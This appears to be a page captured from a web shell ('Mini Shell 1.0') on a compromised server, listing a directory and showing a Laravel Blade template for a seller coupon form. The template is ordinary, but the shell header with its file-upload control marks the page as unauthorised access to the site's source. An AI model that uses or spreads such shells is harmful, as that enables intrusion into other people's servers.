HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/devs.lapieza.net/resources/views/seller/coupons/
Upload File :
Current File : /var/www/devs.lapieza.net/resources/views/seller/coupons/create.blade.php
@extends('seller.layouts.app')

@section('panel_content')



    <div class="aiz-titlebar mt-2 mb-4">

        <div class="row align-items-center">

            <div class="col-md-6">

                <h1 class="h3">{{ translate('Add Your Coupon') }}</h1>

            </div>

        </div>

    </div>



    <div class="row gutters-5">

        <div class="col-lg-10 mx-auto">

            <div class="card">

                <div class="card-header">

                    <h5 class="mb-0 h6">{{translate('Coupon Information Adding')}}</h5>

                </div>

                

                <div class="card-body">

                    <form class="form-horizontal" action="{{ route('seller.coupon.store') }}" method="POST" enctype="multipart/form-data">

                        @csrf

                        @if ($errors->any())

                            <div class="alert alert-danger">

                                <ul class="mt-3">

                                    @foreach ($errors->all() as $error)

                                        <li>{{ $error }}</li>

                                    @endforeach

                                </ul>

                            </div>

                        @endif

                        <div class="form-group row">

                            <label class="col-lg-3 col-from-label" for="name">{{translate('Coupon Type')}}</label>

                            <div class="col-lg-9">

                                <select name="type" id="coupon_type" class="form-control aiz-selectpicker" onchange="coupon_form()" required>

                                    <option value="">{{translate('Select One') }}</option>

                                    <option value="product_base" @if (old('type') == 'product_base') selected @endif>{{translate('For Products')}}</option>

                                    <option value="cart_base" @if (old('type') == 'cart_base') selected @endif>{{translate('For Total Orders')}}</option>

                                </select>

                            </div>

                        </div>



                        <div id="coupon_form">



                        </div>

                        <div class="form-group mb-0 text-right">

                            <button type="submit" class="btn btn-primary">{{translate('Save')}}</button>

                        </div>

                    </form>

                </div>

            </div>

        </div>

    </div>



@endsection



@section('script')



<script type="text/javascript">

    function coupon_form(){

        var coupon_type = $('#coupon_type').val();

		$.post('{{ route('seller.coupon.get_coupon_form') }}',{_token:'{{ csrf_token() }}', coupon_type:coupon_type}, function(data){

            $('#coupon_form').html(data);

		});

    }



    @if($errors->any())

        coupon_form();

    @endif



</script>

@endsection